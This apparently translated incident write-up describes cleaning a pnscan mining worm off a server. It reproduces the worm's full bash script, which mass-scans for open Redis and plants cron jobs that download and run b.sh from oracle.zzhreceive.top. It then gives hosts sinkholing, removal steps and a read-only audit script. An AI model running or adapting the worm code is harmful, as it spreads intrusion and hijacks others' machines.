pnscan mining worm cleanup notes (part 2)

In part one the scanner program was covered, but the real boss (the pnscan miner) has not been dealt with yet, so let's continue:


The machine has Alibaba Cloud's 动态感知 (threat detection) agent installed, and it flagged a mining program.

Looking at the file, it turns out to be a script. Don't rush to clean it up; first study how it runs. It has a check mechanism, and the file is re-downloaded automatically. For something like this I strongly recommend a local domain override (hosts).

#!/bin/bash
setenforce 0 2>/dev/null
ulimit -u 50000
sleep 1
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP 2>/dev/null
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT 2>/dev/null
sleep 1
    if [ -f "/bin/ps.original" ]
    then
        ps.original -fe|grep pnscan |grep -v grep
    else
        ps -fe|grep pnscan |grep -v grep
    fi
if [ $? -ne 0 ]
then
	rm -rf .dat .shard .ranges .lan 2>/dev/null
	sleep 1
	echo 'config set dbfilename "backup.db"' > .dat
	echo 'save' >> .dat
	echo 'config set stop-writes-on-bgsave-error no' >> .dat
	echo 'flushall' >> .dat
	echo 'set backup1 "\n\n\n*/2 * * * * cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
	echo 'set backup2 "\n\n\n*/3 * * * * wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
	echo 'set backup3 "\n\n\n*/4 * * * * curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
	echo 'set backup4 "\n\n\n*/5 * * * * wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
	echo 'config set dir "/var/spool/cron/"' >> .dat
	echo 'config set dbfilename "root"' >> .dat
	echo 'save' >> .dat
	echo 'config set dir "/var/spool/cron/crontabs"' >> .dat
	echo 'save' >> .dat
	echo 'flushall' >> .dat
	echo 'set backup1 "\n\n\n*/2 * * * * root cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
	echo 'set backup2 "\n\n\n*/3 * * * * root wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
	echo 'set backup3 "\n\n\n*/4 * * * * root curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
	echo 'set backup4 "\n\n\n*/5 * * * * root wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
	echo 'config set dir "/etc/cron.d/"' >> .dat
	echo 'config set dbfilename "zzh"' >> .dat
	echo 'save' >> .dat
	echo 'config set dir "/etc/"' >> .dat
	echo 'config set dbfilename "crontab"' >> .dat
	echo 'save' >> .dat
	sleep 1
	pnx=pnscan
	[ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan
	[ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscan
	for z in $( seq 0 5000 | sort -R ); do
	for x in $( echo -e "47\n39\n8\n121\n106\n120\n123\n65\n3\n101\n139\n99\n63\n81\n44\n18\n119\n100\n42\n49\n118\n54\n1\n50\n114\n182\n52\n13\n34\n112\n115\n111\n116\n16\n35\n117\n124\n59\n36\n103\n82\n175\n122\n129\n45\n152\n159\n113\n15\n61\n180\n172\n157\n60\n218\n176\n58\n204\n140\n184\n150\n193\n223\n192\n75\n46\n188\n183\n222\n14\n104\n27\n221\n211\n132\n107\n43\n212\n148\n110\n62\n202\n95\n220\n154\n23\n149\n125\n210\n203\n185\n171\n146\n109\n94\n219\n134" | sort -R ); do
	for y in $( seq 0 255 | sort -R ); do
	$pnx -t256 -R '6f 73 3a 4c 69 6e 75 78' -W '2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a' $x.$y.0.0/16 6379 > .r.$x.$y.o
	awk '/Linux/ {print $1, $3}' .r.$x.$y.o > .r.$x.$y.l
	while read -r h p; do
	cat .dat | redis-cli -h $h -p $p --raw &
	done < .r.$x.$y.l
	done
	done
        done
	sleep 1
	masscan --max-rate 10000 -p6379 --shard $( seq 1 22000 | sort -R | head -n1 )/22000 --exclude 255.255.255.255 0.0.0.0/0 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .shard
	sleep 1
	while read -r h p; do
	cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
	done < .shard
	sleep 1
	masscan --max-rate 10000 -p6379 192.168.0.0/16 172.16.0.0/16 116.62.0.0/16 116.232.0.0/16 116.128.0.0/16 116.163.0.0/16 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .ranges
	sleep 1
	while read -r h p; do
	cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
	done < .ranges
	sleep 1
	ip a | grep -oE '([0-9]{1,3}.?){4}/[0-9]{2}' 2>/dev/null | sed 's/\/\([0-9]\{2\}\)/\/16/g' > .inet
	sleep 1
	masscan --max-rate 10000 -p6379 -iL .inet | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .lan
	sleep 1
	while read -r h p; do
	cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
	done < .lan
	sleep 60
	rm -rf .dat .shard .ranges .lan 2>/dev/null
else
	echo "root runing....."
fi

Seeing that there is a download operation, set up the hosts entry first so it can no longer communicate:

vim /etc/hosts

127.0.0.1 oracle.zzhreceive.top

Delete the script: rm [scan]

Then delete the /bin/ps.original file. After deleting it, the ps command no longer works
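As an added example (not part of the original post, and not the worm's own code), here is a small read-only POSIX shell audit built around the indicators visible in the script above: the domain oracle.zzhreceive.top, the cron locations the redis config set dir / config set dbfilename sequence saves into (/var/spool/cron/root, /var/spool/cron/crontabs/root, /etc/cron.d/zzh, /etc/crontab), the downloader names curl, wget, cd1 and wd1 piped into sh, the hosts sinkhole entry, and the /bin/ps.original stash the script falls back to. The function names, the optional path prefix and the sample tree the demo builds are this example's own assumptions; nothing here touches or deletes anything on the host.

```shell
#!/bin/sh
# Added example, not code from the original post or from the worm: a read-only audit
# for the persistence the b.sh script above leaves behind. All indicators come from
# that script; the function names and the optional path prefix are this example's own.

IOC_DOMAIN='oracle.zzhreceive.top'
IOC_DOMAIN_RE='oracle\.zzhreceive\.top'

# Where the script's redis "config set dir" / "config set dbfilename" sequence saves
# the dump: it keeps dbfilename "root" when it switches dir to the crontabs directory.
CRON_TARGETS='/var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.d/zzh /etc/crontab'

# Return 0 if a cron file carries the worm's domain or a "<downloader> ... | sh" line.
# grep -a: the file is a redis RDB dump with the crontab text embedded in it, so it
# would otherwise be treated as binary and silently skipped.
cron_has_ioc() {
    [ -f "$1" ] && grep -aqE "$IOC_DOMAIN_RE|(curl|wget|cd1|wd1)[^|]*\| *sh( |\$)" "$1"
}

# Check every cron location under an optional prefix (empty prefix = the live host;
# a prefix lets the audit run against a mounted image or a constructed sample tree).
# Findings go to stderr, the count of infected files to stdout.
audit_cron() {
    prefix=${1:-}
    hits=0
    for f in $CRON_TARGETS; do
        if cron_has_ioc "$prefix$f"; then
            echo "INFECTED: $prefix$f" >&2
            hits=$((hits + 1))
        fi
    done
    echo "$hits"
}

# Return 0 if the hosts file already sinkholes the download domain (the step the post
# takes before cleanup, so a cron entry that fires cannot re-fetch b.sh by name).
hosts_sinkholed() {
    grep -qE "^[[:space:]]*(127\.0\.0\.1|0\.0\.0\.0)[[:space:]]+([^#]*[[:space:]])?$IOC_DOMAIN_RE([[:space:]]|\$)" "$1" 2>/dev/null
}

# Return 0 if ps looks replaced: either the stashed original the script falls back to
# exists, or the file at the ps path is a script ("#!" magic) instead of an ELF binary.
ps_is_wrapped() {
    ps_path=$1
    orig_path=$2
    [ -e "$orig_path" ] && return 0
    [ "$(head -c 2 "$ps_path" 2>/dev/null)" = '#!' ]
}

# Whole-host view. With no argument it inspects the live system, read-only.
audit_host() {
    prefix=${1:-}
    n=$(audit_cron "$prefix")
    echo "infected cron files: $n"
    if hosts_sinkholed "$prefix/etc/hosts"; then
        echo "hosts: $IOC_DOMAIN is sinkholed"
    else
        echo "hosts: $IOC_DOMAIN NOT sinkholed"
    fi
    if ps_is_wrapped "$prefix/bin/ps" "$prefix/bin/ps.original"; then
        echo "ps: replaced (ps.original present or ps is a script)"
    else
        echo "ps: looks like a normal binary"
    fi
}

# Demo on a constructed sample tree (not real data), so the script runs offline.
demo() {
    sample=$(mktemp -d)
    mkdir -p "$sample/etc/cron.d" "$sample/var/spool/cron/crontabs" "$sample/bin"
    printf '\n\n\n*/4 * * * * root curl -fsSL http://%s/b2f628fff19fda999999999/b.sh | sh\n\n' "$IOC_DOMAIN" > "$sample/etc/cron.d/zzh"
    printf '0 3 * * * root /usr/local/bin/backup.sh\n' > "$sample/etc/crontab"
    printf '127.0.0.1 localhost\n' > "$sample/etc/hosts"
    printf '#!/bin/sh\n# constructed stand-in for a replaced ps\n' > "$sample/bin/ps"
    audit_host "$sample"
    rm -rf "$sample"
}

demo
```

Running the file as-is prints the demo result for the constructed tree; on a compromised host call audit_host with no argument (or with the mount point of an offline image). The cron check runs with grep -a on purpose: the script abuses redis save to drop an RDB file into the cron directories, so the crontab lines sit inside a binary file. The ps check is only a heuristic for the wrapper the post runs into; a package-manager verification of the ps binary is the authoritative test.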
